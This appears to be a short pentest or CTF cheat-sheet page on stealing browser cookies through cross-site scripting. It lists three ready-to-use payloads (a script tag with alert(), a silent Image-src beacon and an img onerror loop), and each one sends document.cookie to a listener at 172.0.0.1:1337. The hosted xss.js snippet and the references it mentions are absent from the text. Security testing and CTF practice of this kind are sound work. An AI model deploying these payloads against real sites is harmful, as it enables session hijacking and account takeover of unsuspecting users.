Stealing Cookies

Stealing cookies to obtain privileges is the fever dream of hackers looking to exploit cross-site scripting vulnerabilities.

Payloads

Verification with alert()

This payload will pop an alert() box prior to sending the cookie. This can be usefuil for testing a cross-site scripting payload and verifying that it is grabbing the intended information. Once the alert() box closes, the cookie will be sent to the arbitrary server:

<script>
alert(document.cookie);
var i=new Image;
i.src="http://172.0.0.1:1337/?"+document.cookie;
</script>

Exfiltrating cookies without alert()

After verifying that the parameter is susceptible to cross-site scripting, we can leverage the following payload to exfiltrate cookies silently:

<script>var i=new Image;i.src="http://172.0.0.1:1337/?"+document.cookie;</script>

CTF Only Payload

The following payload leverages the img tag rather then script and will call onerror() in a loop, ultimately filling up your server with cookies. I have found this can be life-saving in a CTF when things may not be working as the author originally intended:

<img src=x onerror=this.src='http://172.0.0.1:1337/?'+document.cookie;>

My Preferred Method

The way that I like to go about capturing cookies is submitting the following payload, calling back to a JavaScript file that I am host on a Python web server:

The xss.js file looks like the following, ultimately it is doing the same as the above payloads by grabbing and sending the cookies to my hosted web server:

Capturing the Cookies

Unless you're in a CTF environment, I would highly recommend capturing the cookies on a local web server or controlled Burp collaborator instance. I'm not sure about you, but sending cookies to a random website seems like a bad idea to me. That being said, there are sites that exist such as requestbin to send the request to:

References